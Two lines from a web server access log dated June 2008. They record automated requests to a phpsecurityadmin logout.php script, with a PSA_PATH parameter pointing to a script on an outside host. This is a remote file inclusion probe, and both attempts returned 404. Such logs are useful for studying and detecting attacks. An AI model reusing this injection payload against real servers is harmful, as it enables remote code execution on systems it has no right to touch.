59.106.19.213 - - [25/Jun/2008:11:12:27 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:11:12:30 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
